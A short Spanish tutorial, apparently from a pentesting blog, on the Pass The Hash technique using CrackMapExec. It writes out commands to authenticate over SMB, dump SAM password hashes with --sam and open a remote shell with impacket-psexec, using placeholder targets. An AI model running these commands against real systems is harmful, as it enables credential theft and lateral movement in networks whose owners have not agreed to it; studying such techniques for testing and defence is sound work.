Sobre el ataque:
Pass The Hash es una técnica mediante la cual un atacante captura un hash de contraseña a diferencia de los caracteres de contraseña y luego simplemente lo pasa para autenticación y acceso potencialmente lateral a otros sistemas en red.
Sobre la herramienta:
CrackMapExec o CME es una herramienta escrita en Python diseñada para la post-explotación en entornos Windows, su principal característica es que permite hacer movimientos laterales dentro una red local. Pero también tiene muchas opciones de uso, ya que usa módulos y funcionalidades externas. Permite 5 protocolos de ataque: smb, winrm, ssh, http o mssql.
Ejemplo práctico:
En primer lugar, instalamos crackmapexec clonando el repositorio con el siguiente comando:
❯ apt install crackmapexec
O através de su repositorio
❯ git clone https://github.com/Porchetta-Industries/CrackMapExec
Ejecutaremos crackmapexec junto con el protocolo
, la ip
e indicando -u
para el usuario, -d
para el dominio y -p
para password obtenidos en anteriores artículos.
❯ crackmapexec smb <IP_DOMINIO> -u <USUARIO> -d <DOMINIO> -p <PASSWORD>
Como vemos a continuación nos devuelve Pwned para los siguientes usuarios locales:
También podemos volcar como ejemplo los hashes SAM
Añadiendo al comando anterior la opción --sam
❯ crackmapexec smb <IP_DOMINIO> -u <USUARIO> -d <DOMINIO> -p <PASSWORD>
--sam
Y así de sencillo podemos obtener los hashes SAM de un dominio, con esto podríamos usar psexec para obtener acceso al equipo que queramos
❯ impacket-psexec <DOMINIO>/<USUARIO>:<PASSWORD>
@<IP_DOMINIO>